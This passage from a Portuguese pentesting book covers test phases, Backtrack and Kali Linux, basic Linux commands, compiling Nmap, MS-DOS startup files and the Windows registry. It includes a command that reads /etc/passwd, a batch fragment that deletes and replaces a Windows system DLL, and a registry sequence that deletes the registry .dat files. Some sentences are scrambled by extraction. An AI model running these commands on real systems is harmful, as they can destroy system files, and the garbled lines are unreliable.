Scanning Na fase de scanner será necessária a utilização de ferramentas que torne possível a descoberta de informações sobre os sistemas e serviços disponíveis, sistemas operacionais, aplicações, estado das portas, versões dos serviços de rede etc.

Sondagem e Mapeamento Consistem na varredura por hosts ativos, mapeamento de topologia e regras de firewall, detecção de serviços em execução etc.


r.c om .br

93


Força Bruta Visa detectar serviços de autenticação ou controle de acesso vulneráveis a ataques de tentativa e erro de senhas. Analisa a qualidade da política de senha e de sua implementação. Análise de Tráfego de Rede Verifica se é possível identificar e obter alguma informação sensível através da manipulação de tráfego de rede. Avaliação de Servidores Web Busca as principais vulnerabilidades em serviços deste tipo. Manipula requisições de modo a tentar comprometer a segurança de serviços web. Obtenção de acesso "Invasão" Essa é uma fase crucial e somente deve ser executada se estiver no escopo do contrato, aqui os agentes envolvidos no processo, devem reler as clausulas contratual, pois existem riscos de indisponibilidade ou ate mesmo o comprometimento de aplicações na hora dos testes. Ou seja, deve haver uma clausula contratual que esclareça como devem ser feitos os testes, a que horas, a previsibilidade de problemas de indisponibilidade etc.

Manutenção do acesso Dificilmente se executam essa etapa, já que, normalmente não há interesse por parte do cliente de tal necessidade. Um cliente jamais iria desejar ter em seus sistemas computacionais alguma backdoor ou outro tipo de dispositivo de acesso remoto nãoterautorizado a anterior. comprovação de vulnerabilidades pode sido feita jánaque etapa


r.c om .br

94


Limpeza de rastros Apensar de apresentar nesse trabalho algumas ferramentas para essa tarefa, à mesma não tem tido muita utilidade, já que na maioria das vezes nem mesmo a invasão é permitida pelo escopo.

Documentação Na documentação deve-se apresentar a fundamentação do trabalho, pois, nessa fase serão apresentados todos os passos percorridos, qual a metodologia utilizada, quais informações encontradas, qual o grau de risco encontrado, o impacto sobre o negocio do cliente caso tais vulnerabilidades sejam exploradas por alguém malicioso e como corrigir o problema.

Apresentação dos resultados e sugestões Sugestões de como corrigir as vulnerabilidades encontradas e manter os sistemas computacionais seguros. Deve-se apresentar o relatório o mais detalhado possível com todas as sugestões necessária a boa execução de tais sistemas com risco mínimo de segurança e um plano de contingencia em casos de comprometimento dos sistemas por alguém por acesso não autorizado.

O Backtrack e o Kali Linux O Backtrack e o Kali Linux são distribuições Linux, o que já seria um grande diferencial, mas não; eles são só isso. Eles são distribuições Linux idealizadas para atender um segmento de mercado que tinha que fazer tudo no braço "os hackers" sempre que


r.c om .br

95


precisavam de alguma coisa nesse segmento, tinham que desenvolver ou mesmo que não o fizesse, eram obrigados a trabalhar com o imenso arsenal de ferramentas dispersas já desenvolvidas para uma infinidade de propósitos e diversos programadores. Depois do backtrack todos os nossos problemas em analise de vulnerabilidades acabaram e hoje é só você digitar o login "root" a senha "toor" que imediatamente você será direcionado a uma Shell Linux, é aqui que começa uma maravilhosa experiência pois o backtrack não é um sistema Linux qualquer. Baseado no kernel do Ubuntu, o que facilitou bastante em relação a sua antiga versão que era baseada em slackware o que tornava o aprendizado bem mais difícil.

Como padrão o backtrack apresentará sempre uma shell linux e se você deseja utiliza-lo em ambiente gráfico basta digitar startx


r.c om .br

96


O Ubuntu é a distribuição Linux usada pela maioria dos usuários que utilizam desktops por seu conjunto de facilidades e o backtrack é usado por todos os analistas de vulnerabilidades que eu conheço. Um analista que utiliza o backtrack tem seu trabalho facilitado de forma extraordinária, todos os hackers e estudantes de segurança da informação se já não o fazem, devem conhecer e utilizar o backtrack. Imediatamente após você digitar startx e pressionar enter você será apresentado ao backtack em ambiente gráfico incluindo as facilidades do sistema linux, mais especificamente as facilidades do Ubuntu.


r.c om .br

97


Atualmente o backtrack tem um composto de mais de 300 ferramentas diferentes e atualizadas. Nossa meta é apresentar e ensinar a utilização de todas elas, mais nessa obra serão apresentadas em media 30% delas, já que esse projeto teve que ser dividido em volumes. Acreditamos que essa obra será de grande valia para profissionais de redes e todos aqueles que desejam entrar nesse mercado ou buscar conhecimentos aprofundados sobre analise de vulnerabilidades de forma objetiva.


r.c om .br

98


Existem muitas soluções comerciais para esse trabalho e não podemos negar a sua importância, mais o backtrack é imbatível por oferecer as facilidades de um sistema Linux fácil de usar, como é o caso do Ubuntu e combinar com um verdadeiro arsenal para testes de invasão. Soluções como Metasploit e Nmap estão integradas ao backtrack por serem fundamentais para o trabalho dos analistas.

Comandos em Shell Linux Para aqueles que ainda não estão familiarizados com Linux eu resolvi incluir esse tópico com alguns comandos básicos, mais com foco especifico na atividade de analise de vulnerabilidades, não tenho aqui a pretensão de escrever nessa obra tudo sobre Linux, mais como grande parte de nossa obra esta baseada numa distribuição Linux eu creio ser de grande valia para todos.


r.c om .br

99


Usando o interpretador de comandos

Abre uma nova sessão para um usuário: # login Tem como função desconectar um usuário de uma determina sessão:

# logout O objetivo é encerrar uma sessão de trabalho: # exit Comandos para desligar o computador: # halt (desliga sumariamente)

# shutdown -h now (desliga agora) # shutdown 18:00 (desliga em um horário especificado) # shutdown -h 10 (desliga em menos n tempo) # shutdown (desliga na hora especificada e envia mensagem na rede) Comando para reiniciar o computador: # reboot ou # shutdown -r

now

ww w. cl ub ed oh ack er .c om .b r

1 00


ou # shutdown -r 15 now ou # init 6 Exibir a quantidade de tempo desde a última reinicializarão do sistema: # uptime

Página de manual e de informações sobre os comandos: # man shutdown Visualizar os processos em tempo real: # top Processos em execução no sistema: # ps aux Arquitetura de máquina: # arch Mostra o diretório corrente: # pwd Comando que muda um subdiretório corrente a partir do diretório atual: # cd [diretório] # cd /root

# cd - (volta ao último diretório acessado) # cd .. (acessa o diretório anterior na árvore de diretórios) Criar novo diretório: # mkdir [diretório] Remover diretório vazio: # rmdir [diretório] Remover um diretório e todo o seu conteúdo: # rm –rf [diretório]


1 01


Criando um arquivos: # touch arquivo Movendo um arquivo: # mv /root/teste /home/user/ Movendo um arquivo para o diretório local: /home/user # mv /root/teste Copiando um arquivo: # cp gnu /home/user/

# cp /root/gnu /home/user Copiando um arquivo para o diretório local: /home/user# cp /root/gnu . Editando um arquivo: # nano gnu

Exibe a árvore de diretórios: /# tree Exibir informações do sistema, tais como: o sistema operacional, versão do kernel, arquitetura da máquina e muitos outros: # uname

[opções] # uname -r (versão de kernel) # uname -m (arquitetura de máquina) # uname -n (mostra o hostname) # uname -p (mostra o tipo de processador)


1 02


# uname -v (mostra a data da versão do kernel) # uname -o (mostra o nome do Sistema Operacional) # uname -s (mostra o nome do Kernel) # last (Mostra uma listagem de entrada e saída de usuários no sistema)

# history (Exibe o histórico) # lastb (Logins mal sucedidos) Comandos para criação manipulação de contas de usuários adduser (pode-se também utilizar-se do comando useradd);

adduser opções usuário Em opções, pode-se colocar parâmetros específicos para a configuração da conta de usuário que será criada. Consulte o manual completo do comando, digitando man adduser no terminal.


1 03


#passwd adonel (trocar a senha do usuário adonel)

Listar usuários do sistema #getent passwd | cut -d\: -f1 ou simplesmente #getent passwd ou #cat /etc/passwd (exibe informações sobre as contas dos usuários e do sistema)

#who (Para usuário logado)


1 04


Comandos de configuração e consulta de redes A configuração da rede no Linux é feita de forma muito simples através do comando ifconfig ethx "onde x representa o numero da placa de rede" e ou dentro do arquivo /etc/network/interfaces, neste arquivo você vai colocar as informações de ip / máscara / gateway e outras informações que considere necessárias para o bom funcionamento da rede. Edite com seu editor de texto preferido ou # vi /etc/network/interfaces


1 05


# Para que a placa eth0 possa subir automaticamente auto eth0


1 06


# Configuração para que o ip fique estático, ou seja, não mude como no caso em que você está utilizando dhcp. iface eth0 inet static address xxx.xxx.x.xx netmask 255.255.255.0 gateway xxx.xxx.x.254 network xxx.xxx.x.0 broadcast xxx.xxx.x.255 "Onde xxx.xx.xx.xx representa os ip's da rede, a mascara de sub-rede, o gateway padrão, a rede e o endereço de broadcast".

Após a escolha das configurações desejadas no arquivo de configuração, basta salvar e sair do arquivo. Adicionalmente pode-se configurar as informações de DNS no arquivo resolv.conf que fica dentro do diretório /etc; # vi /etc/resolv.conf nameserver xxx.xxx.xxx.xxx nameserver xxx.xxx.xx.xxx onde xxx.xxxx.xx.xxx representa o ip de seus servidores DNS, seja local ou remoto. Ao final, basta reiniciar as placas de rede; # /etc/init.d/networking restart


1 07


Alguns comandos úteis #ifconfig (irá exibir as informações dos adaptadores de redes).

#ifonfig eth0 192.168.0.50 (Irá configurar a placa de rede eth0 com o ip 192.168.0.50 e mascara de sub-rede padrão 255.255.255.0)

#route –n (Consulta a tabela de roteamento da máquina local)


1 08


#route add defalut gw 192.168.1.10 (Adiciona uma rota padrão ao arquivo de configuração de roteamento na máquina local).

#dhclient (Responsável por configurar a rede automaticamente através de um servidor DHCP disponível na rede).


1 09


Instalação de programas (pacotes) A instalação de pacotes (como são chamados os programas no Linux) é muito simples, basta ter indexado o repositório no arquivo /etc/apt/sources.list

Estando tudo devidamente indexado, basta digitar no prompt em qualquer shell com poderes de root o comando aptitude install + nome do pacote que deseja instalar, mais nem sempre esse pacote pode estará relacionado nos servidores espelho disponíveis na internet. Nesses casos teremos que baixar o código fonte e compilar, em seguida fazer a instalação, só assim o programa funcionará corretamente.


1 10


Compilação de programas O procedimento de compilação de um programa é bem simples e parte do princípio que, através do código fonte do programa disponível para uso, qualquer um possa ter acesso ao código e gerar o binário final. O procedimenNenhuma entrada de índice remissivo

foi encontrada.to de compilação sempre é bem parecido para todas as aplicações, porém quando for compilar algum programa devemos consultar o arquivo “INSTALL” que sempre está presente junto com

o código fonte. Durante este trabalho será necessário apenas dos seguintes pacotes pré-instalados: •

gcc

•

g++

•

make

•

libc6-dev

•

glibc-devels (algumas outras distribuições usam)

Conceito de compilação de programas: A compilação é sempre um processo simples, mais deve ser observado o roteiro


1 11


abaixo para que possamos ter uma compilação tranquila do inicio ao fim.

Se tiver o ./configure, rode o configure. Todos os recursos de compilação estão no makefile.

Compilando o Nmap como exemplo prático: Vamos baixar o nmap (utilitário de rede que iremos utilizar em momento especifico nessa obra para verificação e análise de portas, serviços de rede e vulnerabilidades). Baixe o código fonte, que está disponível em www.insecure.org. Descompacte o pacote: # tar xvjf nmap-versão.tar.bz2 –C

/usr/local ww w. cl ub ed oh ack er .c om .b r

1 12


Acesse o diretório onde se encontram os códigos fonte: # cd

/usr/local/nmap-versão Começando a compilação: Execute o script configure, este irá passar os parâmetros de como deve ser compilado o programa e gerar o arquivo Makefile, que servirá como referência para o comando make. Digite: # ./configure Compile o pacote com o comando: # make Opcionalmente você pode testar a integridade dos binários compilados através do comando: # make check Se não tiver havido nenhum erro, agora já pode instalar o programa, os arquivos de dados e a documentação com o comando: #

make install Caso necessário pode-se remover os arquivos binários e de objeto do diretório fonte que não serão mais necessários: # make

clean Agora é só testar:

# nmap localhost


1 13


Obs: onde se lê versão deve-se substituir pelo numero da versão do Nmap que você fez download. Consulte sempre o manual atualizado no site oficial do programa que você deseja instalar. Pois é, já estávamos muito satisfeitos com o Backtrack, eis que o pessoal resolve nos presentear com o Kali Linux, uma distribuição Linux baseada em Debian, muito mais estável que o ubuntu e com a maioria das ferramentas recompiladas. E o que é melhor, suporte total a maioria dos dispositivos Wireless.

O que é o Kali Linux?


1 14


Kali Linux é uma avançada distribuição Linux especializada em Testes de Intrusão e Auditoria de Segurança.

Quais as funcionalidades do Kali Linux?

Kali é uma reconstrução completa do BackTrack Linux, que adere totalmente aos padrões de desenvolvimento do Debian. Uma infraestrutura completamente nova foi montada, todas as ferramentas foram revistas e empacotadas, e nós utilizamos Git como nosso Sistema de Controle de Versões.

Mais de 300 ferramentas de testes de intrusão: Depois de rever cada ferramenta que estava incluída no Backtrack, eliminamos um grande número de ferramentas que não funcionavam, ou para as quais havia outra ferramenta com funcionalidade semelhante. Sempre será gratuito: Kali Linux, como seu predecessor, é completamente livre, e sempre permanecerá como tal. Você nunca, mais nunca mesmo terá que pagar pelo Kali Linux. Repositório Git livre: Somos proponentes convictos do software de código aberto e nosso repositório está disponível para todos que todos vejam e todos os fontes estão disponíveis para aqueles que desejem adaptar e remontar os pacotes. O Kali foi Complacente com o padrão FHS: desenvolvido para aderir ao Padrão Hierárquico do Sistema de


1 15


Arquivos (ou FHS da sigla em inglês), permitindo que todos os usuários Linux facilmente localizem arquivos binários, de apoio, bibliotecas, etc.

Vasto suporte à dispositivos wireless: Construímos o kali Linux para suportar tantos dispositivos wireless quanto pudemos, permitindo que o mesmo executasse adequadamente numa vasta gama de hardware e o tornando compatível como diversos outros dispositivos sem fio e USB. Kernel adaptado para injeção de pacotes: Como consultores de testes de intrusão, a equipe de desenvolvimento às vezes precisa fazer avaliações em redes sem fio, então nosso kernel já inclui os últimos patches de injeção de pacotes. Ambiente de desenvolvimento seguro: A equipe do Kali Linux é formada de um pequeno grupo de pessoas de confiança as quais só podem submeter pacotes e interagir com os repositórios usando múltiplos protocolos de segurança. Repositórios e pacotes com assinaturas GPG: Todos os pacotes do Kali são assinados por cada desenvolvedor individual quando eles são construídos e submetidos ao repositório, que em seguida assina os pacotes também. Múltiplos idiomas: Embora as ferramentas usadas em testes de intrusão tendam a ser escritas em inglês, nós nos asseguramos que o Kali possuísse um suporte a idiomas real, permitindo que mais usuários o operassem no seu idioma nativo, e encontrasse as ferramentas de que precisa para realizar suas tarefas. Nós entendemos Totalmente customizável: perfeitamente que nem todos irão concordar com nossas


1 16


decisões de design, então tornamos o mais fácil possível que nossos usuários mais aventureiros customizem o Kali Linux ao seu gosto, através de todo o sistema até mesmo o kernel.

Suporte à ARMEL e ARMHF: Já que os sistemas baseados em processadores ARM estão se tornando mais e mais presentes e baratos, sabíamos que o suporte a processadores ARM no Kali precisaria ser o tão robusto quanto pudéssemos gerenciar, o que resultou em instaladores funcionais tanto para sistemas ARMEL quanto para ARMHF. O Kali Linux tem repositórios ARM integrados com a distribuição principal, então ferramentas para ARM serão atualizadas em conjunto com o resto da distribuição. O Kali atualmente está disponível para os seguintes dispositivos ARM: o o o o

rk3306 mk/ss808 Raspberry Pi ODROID U2/X2 Samsung Chromebook

Lembre-se: O Kali é especialmente indicado para testes de intrusão, então toda a documentação deste site pressupõe um conhecimento anterior do sistema operacional Linux. Fonte: Copia na integras do site do Kali Linux http://www.kali.org/ acessado em 25/05/2013


1 17


Onde estão as ferramentas no Kali?

Ferramentas em modo gráfico Veja como ficou simples a utilização das ferramentas do Kali


1 18


No exemplo acima eu apenas digitei a palavra air e pressionei a tecla tab e me foi mostrada toda suíte de aplicativos air. Assim você não irá necessitar ficar entrando diretório por diretório em busca de uma ferramenta ou outra, do prompt mesmo você irá digitar o nome da ferramenta. Você poderá encontrar elas em usr/share, conforme demonstra a tela capturada e demonstrada abaixo.


1 19


Realmente não é possível negar o avanço do Kali em relação ao Backtrack, Mesmo o considerando excelente, mais o fato das ferramentas terem sido recompiladas e as inovações em relação aos dispositivos Wireless torna o Kali muito superior ao Backtrack.

Um pouco de Windows Começaremos esse capitulo conhecendo um pouco mais sobre o funcionamento e controle dos sistemas da Microsoft desde o MS-DOS


1 20


Até o registro do Windows, o gerenciamento de memória, como é montado o registro o concluiremos com o Microsoft Windows PowerShell,

(Novo prompt de comando do Windows), muito mais poderoso que o cmd.exe, voltado para automatização, via scripts e canalização de objetos por uma sequência de comandos para manutenção fornece de sistemas porà administradores de sistemas. O Windows PowerShell acesso todas as APIs .NET disponíveis no sistema, além dos objetos COM, e outras APIs Microsoft. O Windows PowerShell é integrado por padrão ao Windows Server 2008 R2, Windows 7 e Windows 8, e também pode ser baixada gratuitamente para instalação em outras versões do Windows em: http://www.microsoft.com/en-us/download/details.aspx?id=2560

Config.sys não estou falando inicio dono foiinicio assim: mundo,Nos maisinicio sim do deCalma, uma grande revolução quedoculminou estágio atual e em grandes avanços no que chamamos de sociedade da informação, pois não ha como desassociar a informação da industria de software, mais especificamente a Microsoft. (Discussões ideológicas a parte), Fundada em 1975 por Bill Gates e Paul Allen. O


1 21


primeiro produto desenvolvido pela empresa foi uma versão do interpretador BASIC, para o computador Altair 8800 e logo após Fortran, para os famosos computadores baseados em CP/M. Bem, decisivamente esse trabalho não vai contar a história da Microsoft ou de qualquer outra companhia, citei aqui com a certeza de que, mesmo não sendo desenvolvido por ela, o sistema operacional MSDOS pode ser considerado como um dos pilares para evolução da informática na década 80 e desde 1984, ano em que foi lançada a primeira versão beta do Windows até nos dias atuais com o Windows 8 nós temos discutido sobre os problemas e mais problemas de instabilidade e falta de segurança nesses sistemas operacionais, quando comparados com os sistemas GNU/Linux. Vale ressaltar que grande parte de tais problemas ocorrem por falta de conhecimento de quem os implementa e administra. Por ser considerado um sistema fácil de instalar (Não exigindo quase ou nenhum conhecimento, pois ele particiona o disco e se instala quase que sozinho, restando para o técnico apenas alguns cliques de mouse), mais vamos ao que interessa. O Sistema Operacional MS-DOS possuía um arquivo de configuração no diretório raiz, chamado Config.sys. Era a partir dele que todo o sistema era configurado. A partir dos Windows 9x e Windows NT, esse arquivo perdeu sua importância, apesar de ainda ser mantido para algumas tarefas especificas. Você pode estar se perguntando, o que tem a ver uma analise de vulnerabilidades com esse sistema antigo e chatos?

Eu posso responder: Os comandinhos que formam a base de conhecimento desse sistema já me tiraram de muitos apertos no passado e, por incrível que pareça, mesmo nos dias de hoje. Mesmo comandos, chamados mais modernos irão depender deles, pois nunca


1 22


perdem sua validade e tem mais, não se surpreenda se eles voltarem nos sistemas operacionais futuros. Então vamos aos fatos: Como o MS-DOS era um sistema operacional extremamente rudimentar, ele por si só não reconhecia os periféricos mais modernos da época, tais como as modernas unidades de cd-rom e placas de som, para que tais dispositivos funcionassem corretamente era necessário um pequeno roteiro que iria ensinar ao sistema como ele deveria fazer para lidar com estes dispositivos. Esse era o papel do driver, um pequeno programa carregado em memória que "ensinava" ao sistema como trabalhar com um determinado periférico, No MS-DOS, os drivers eram carregados geralmente pelo Config.sys através do comando DEVICE= ou DIVECEHIGH=. Um dos grandes inconvenientes do MS-DOS era o fato de o mesmo trabalhar com o processador em modo real, permitindo o reconhecimento de apenas 640 KB de memória RAM. Essa limitação era solucionada fazendo com que o driver fosse carregado na área de memória acima de 640 KB, chamada de memória superior, assim a memória convencional não ficava sobrecarregada. Isto era feito através do comando DEVICEHIGH=.

Alguns comandos MS-DOS DEVICE=: Para carregar o controlador de dispositivo instável para a memória (um controlador de dispositivos instável é como um programa que controla um componente de hardware). DEVICEHIGH=: Para carregar um controlador de dispositivos instável na área de memória superior.


1 23


DOS=: Para especificar se o MS-DOS deve usar a área de memória alta (HMA) e se permite acesso a área de memória superior (UMB). FILES=: Para especificar quantos arquivos pode ser abertos ao mesmo tempo. Normalmente eu utilizava 200, mais dependendo o tipo de hardware poderia variar. INSTALL=: Para carregar um programa residente em memória (TRS). REM=: Para indicar que o seguinte texto é um comentário descritivo, não um comando. Pode ser utilizado para desativar um comando por exemplo. SET=: Para definir o valor de variáveis de ambiente, tal como prompt ou temp.

Controladores de dispositivos instável Um controlador é denominado instável porque você o instala incluindo um comando no arquivo Config.sys por exemplo: O COUNTRY.SYS: Para definir as convenções de idioma do país ou os comandos DISPLAY.SYS: Para aceitar mudança de página de códigos para monitores, EMM386.EXE: Para simular memória expandida e permitir o acesso a área de memória superior, HIMEM.SYS: Para gerenciar o uso de memória estendida, SETVER.EXE: Para carregar a tabela de versão do MS-DOS na memória. Um bom exemplo de configuração para que um micro PC possa ficar no ponto ou se for o caso de um dia você precisar criar um CONFIG.SYS básico para MS-DOS. Acredite, ainda temos softwares


1 24


em clipper ou mesmo algumas configurações de hardware que necessitam disso. No prompt de comando (cmd.exe) basta digitar edit config.sys

irá aparecer a tela azul acima e nela você deve incluir as linhas abaixo. device=c:\dos\himem.sys device=c:\dos\e,,386.exe noems dos=high,umb stack=9,256 files=200 buffers=20 country=055,,c:\dos\country.sys devicehigh=c:\dos\display.sys con=(,850)


1 25


devicehigh-c:\windows\ifshlp.sys Device=c:\windows\command\display.sys con=(ega,,1) Country=055,850,c:\windows\command\country.sys

Autoexec.bat O Autoexec.bat é um arquivo em lote, isto significa que qualquer comando válido pode ser executado diretamente no prompt de comando, ao contrário do Config.sys, que possui comandos próprios. Sua edição pode ser feita através do comando edit c:\autoexec.bat da mesma forma que ocorre no Config.sys. Através do dele podemos carregar drivers, fazer mapeamento de drivers e impressora, unidades de disco em rede e até executar comandos e programas residentes em memória. Acredite, ele não estaria ai sem um propósito.

Tela do autoxec.bat


1 26


Principais comandos utilizados no autoexec.bat PROMPT: Para definir o aspecto do aviso de comando. PATH: Para especificar os diretórios e a ordem na qual o MSDOS pesquisa arquivos executáveis (arquivos com extensão COM, EXE, BAT). ECHO OFF: Para instruir o MS-DOS a não exibir os comandos do seu arquivo autoexec.bat a medida que são executados. SET: Para criar uma variável de ambiente que pode ser usada por programas. LOADHIGH: Para carregar os controladores de dispositivos instável para a área de memória superior. MODE: Para definir as características do seu teclado, monitor, impressora e portas de comunicação.

Veja um exemplo de autoexec.bat @ echo off Set temp=c:\windows\temp If exist c:\windows\temp\~*.* del c:\windows\temp\~*.* Mode con codepage prepare=((850) c:\windows\command\ega.cpi) Mode con codepage select=850


1 27


Loadhigh= c:\windows\command\keyb.com br Loadhigh=c:\windows\command\doskey.com Path=c:\windows;c:\windows\command;c:\ Cls Obs: a especificação de cada comando foi colocada em letras maiúsculas para melhor fixação e no exemplo foi colocado o formato correto como o fragmento abaixo que executa uma tarefa especifica em relação à wuauserv.dll. net stop wuauserv del %systemroot%\system32\wuauserv.dll copy wuaus.dll %systemroot%\system32\wuauserv.dll net start wuauserv

IO.SYS Na época em que o MS-DOS era utilizado como Sistema Operacional, esse arquivo funcionava como um dos núcleos desse sistema contendo o MS-DOS – BIOS e o módulo de inicialização, o SYSINIT, que consistiam em devices drivers residentes (rotinas de baixo nível destinadas a controlar os dispositivos periféricos suportados pelo computador) e um módulo adicional de inicialização. Com o advento do Windows 95, esse arquivo passou a ser o próprio DOS 7.10, ou seja, o Sistema Operacional em modo Real de 16 bits, inserido no Windows 9x, executando funções bem diferentes das anteriores.


1 28


Esse arquivo contém informações necessárias para inicializar o computador e carregar dispositivos do sistema que antes eram carregados pelos arquivos Autoexec.bat e Config.sys. Os drivers carregados como padrão no IO.SYS incluem os arquivos: HIMEM.SYS IFSHLP.SYS SETVER.EXE DBLSPACE.BIN ou DRVSPACE.BIN A maioria das funções comuns desempenhadas pelas várias entradas nos arquivos Config.sys passaram a ser fornecidas por padrão no IO.SYS.

Parâmetros do Config.sys incorporadas ao IO.SYS Dos=High Himem.sys Ifshlp.sys Setver.exe Files= Lastdrive= Buffers=


1 29


Stacks= Shell=command.com Fcbs=

COMMAND.COM Este arquivo é o interpretador de comandos padrão do MSDOS e demais sistemas da Microsoft, mesmo os mais modernos tem um interpretador de comando. Este interpretador de comandos serve de interface entre o usuário e o Sistema, sendo capaz de executar um grupo de funções internas, tais como manipular arquivos ou interpretar arquivos de processamento em lote (que fornecem uma limitada linguagem de programação, útil para escrevermos pequenos programas compostos de uma sequencia de comandos do MS-DOS). Este arquivo estava residente em dois diretórios sendo o primeiro, no diretório raiz, a falta desse arquivo neste diretório, fazia com que o sistema operacional não inicializasse, acusando a falta de um interpretador de comandos. O segundo estava presente no diretório C:\Windows, a inexistência desse arquivo neste diretório também fazia com que o sistema não conseguisse acessar o modo DOS.

Como acessar o MS-DOS Para acessar o DOS existiam, basicamente, 3 formas. Se você estivesse utilizando um sistema operacional antigo da Microsoft, como o Windows 95 ou o Windows 98, bastava clicar em Iniciar / Desligar e


1 30


escolher a opção Reiniciar o computador em modo MS-DOS (ou equivalente). Outra forma nessas versões do Windows consistia em clicar em Iniciar / Programas e selecionar Prompt do MS-DOS. Porém, este último procedimento acessava o DOS com o Windows ainda carregado, o que significava que alguns comandos podiam não funcionar. Mais se você quisesse ir direto para o DOS sem passar pelo Windows, bastava pressionar o botão F8 repetidas vezes logo após ligar a máquina e uma lista aparecer. Se, no entanto, você venha a utilizar um sistema operacional mais recente, como o Windows XP, o Windows Vista ou o Windows 7, o DOS em si não existe, mas sim um prompt que simula parcialmente suas funcionalidades. Isso ocorre porque esses sistemas não são "dependentes" do DOS como eram os Windows 95 e 98, por exemplo. Isso significa que, nos sistemas operacionais atuais, alguns comandos do MS-DOS podem simplesmente não funcionar. Para acessar o prompt de comando no Windows XP, Vista ou o Windows 7, basta digitar o comando CMD em Iniciar / Executar.


1 31


O que é o registro no Windows? De acordo com a Microsoft, o Registro do Windows de 32 bits ( Windows 9x e Windows NT ) é um banco de dados hierárquico que centraliza e armazena todas as configurações de hardware e software do computador. Banco de dados porque sua função primordial é o armazenamento de dados de configuração chamados valores. Hierárquico, porque como você terá a oportunidade de examinar, a estrutura do Registro é semelhante à estrutura hierárquica de uma árvore de diretórios e subdiretórios, o que confunde muitos usuários desavisados que imaginam que as chaves de Registro são realmente pastas ocultas do Windows existentes no disco.

Origens do registro O primeiro esboço do Registro surgiu no Windows 3.1 com o arquivo Reg.dat. Na época era um tanto limitado, servindo exclusivamente para guardar informações sobre associações de arquivos (que permitiam que o comando associar do gerador de arquivos do Windows 3.1 funcionasse ) e também informasse sobre OLE ( Object linking and Embedding ) usadas pelos aplicativos clientes ou servidores OLE. A Microsoft afirma que embora não seja possível perceber nenhuma significativa naoestrutura Registro em relação as versõesdiferença de seus sistemas, desde Windowsdo9X até o Windows 7, o código que o implementa, é sempre otimizado (em nível binário), de modo a aumentar a velocidade do seu processamento a cada nova versão.


1 32


Arquivos do registro no Windows Windows armazena o conteúdo do Registro em dois arquivos chamados SYSTEM.DAT e USER.DAT. O primeiro armazena as chaves e sub-chaves relativas à configuração do hardware e do software. O segundo guarda as configurações específicas dos usuários. Uma vez que o Windows esteja funcionando perfeitamente bem, é aconselhável criar uma cópia manual dos arquivos do registro. Para isso é necessário desativar os atributos hidden e system de USER.DAT e SYSTEM.DAT. Utilizamos, para isso, o utilitário ATTRIB.EXE existente na pasta COMMAND que sempre existe dentro do diretório do Windows. Como \%WINDIR%\COMMAND está referenciado no path do Windows, podemos utilizar os comandos abaixo: attrib c:\windows\*.da? -h -r -s -a del c:\windows\*.dat ren c:\windows\*.da? *.dat attrib c:\windows\*.dat +h +r +s +a Agora é possível usar o comando COPY para copiar ambos os arquivos para um local seguro.


1 33


Navegando pelo registro Se você consegue "navegar" pelo pelo Windows não sentirá nenhuma dificuldade em navegar EditorExplorer de Registro. O Registro é formado por 6 chaves básicas (listamos na ordem em que aparecem no Editor de Registro): HKEY_CLASSES_ROOT KEY_CURRENT_USER KEY_LOCAL_MACHINE HKEY_USERS HKEY_CURRENT_CONFIG HKEY_DYN_DATA Em cada chave é armazenado um tipo diferente de informação. Iremos ver como funciona cada chave e qual o tipo de informação há armazenada. Sempre que possível iremos apresentar dicas que sejam válidas para todos os micros. É muito importante notar que não há como fazermos um roteiro válido para todos os micros, pois em cada micro o Registro será um pouco diferente, já que os programas e periféricos instalados varia de micro para micro, mas vamos apresentar para você a maioria dos sistemas operacionais da Microsoft, desde o Windows 9X até o Windows 7.


1 34


HKEY_LOCAL_MACHINE Essa é uma das chaves mais importante do Registro. É nela que estão armazenadas informações a respeito dos periféricos e programas instalados no micro, incluindo a configuração do próprio Windows. Fisicamente falando, as informações dessa chave estão armazenadas no arquivo System.dat. Essa chave possui as seguintes sub-chaves.

Config: Armazena configurações para os Perfis de Hardware instalados no micro. Na maioria das vezes temos somente um perfil de hardware instalado e, daí, essa chave normalmente apresenta somente uma subchave, 0001 - que contém informações sobre esse único perfil. Caso você crie novos perfis de hardware (o que pode ser feito através da guia Perfis de Hardware do ícone Sistema do Painel de Controle) novas chaves serão criadas. Enum: Informações sobre o hardware do micro. hardware: Informações sobre portas seriais e modems utilizados pelo programa HyperTerminal. Network: Informações criadas quando um usuário se conecta a um micro conectado em rede. Armazena informações como nome do usuário, logon, tipo de servidor, etc. Security: Informações sobre a segurança da rede e administração remota. Software: Informações e configurações de programas instalados no micro. Nessa chave as informações são armazenadas no padrão fabricante/programa/versão /configurações. System: Essa chave comanda o carregamento de drivers durante o boot e demais configurações do sistema operacional. A subchave Control contém informações utilizadas durante o ww w. cl ub ed oh ack er .c om .b r

1 35


carregamento do sistema operacional, enquanto a subchave Services contém informações sobre o carregamento de drivers de dispositivo. HKEY_USERS O Windows permite que mais de um usuário utilize um mesmo micro, cada um com suas configurações particulares, tais como proteção de tela, papel de fundo, atalhos presentes na área de trabalho, etc. A escolha do usuário é feita no logon do Windows, quando o sistema pede o nome do usuário e sua senha. Essa chave armazena as configurações do sistema para cada usuário e fisicamente está armazenada no arquivo User.dat. Quando o sistema está configurado para o acesso por apenas um usuário, a chave HKEY_USER contém apenas uma subchave, .default, contendo todas as configurações pessoais do sistema (proteção de tela, papel de parede, etc). No caso de haver mais de um usuário configurado no sistema, quando ele faz logon no sistema, essa chave conterá suas configurações pessoais. Por exemplo, no caso de haver um usuário chamado Adonel, existirá uma chave chamada "Adonel" quando esse usuário entrar no sistema. A chave .default continuará existindo, contendo as configurações padrão do sistema. Se no mesmo micro existir um outro usuário chamado Maria, a chave "Maria" só existirá quando o próprio usuário fizer logon no sistema, de forma que um usuário não consiga ver nem alterar configurações de outro usuário (ou seja, o usuário Maria não conseguirá ver as configurações do Adonel e vice-e-versa). HKEY_CURRENT_USER Essa chave é um atalho para a chave do usuário que fez logon no sistema. Ou seja, se o usuário "Adonel" foi quem fez logon no


1 36


sistema, essa chave apontará para a chave HKEY_USERS\Adonel. Portanto, fisicamente essa chave não existe, pois apenas aponta para outra parte do registro. HKEY_CLASSES_ROOT Essa chave é um atalho para a chave HKEY_LOCAL_MACHINE\SOFTWARE\Classes. Essa chave existe para manter compatibilidade com programas antigos.

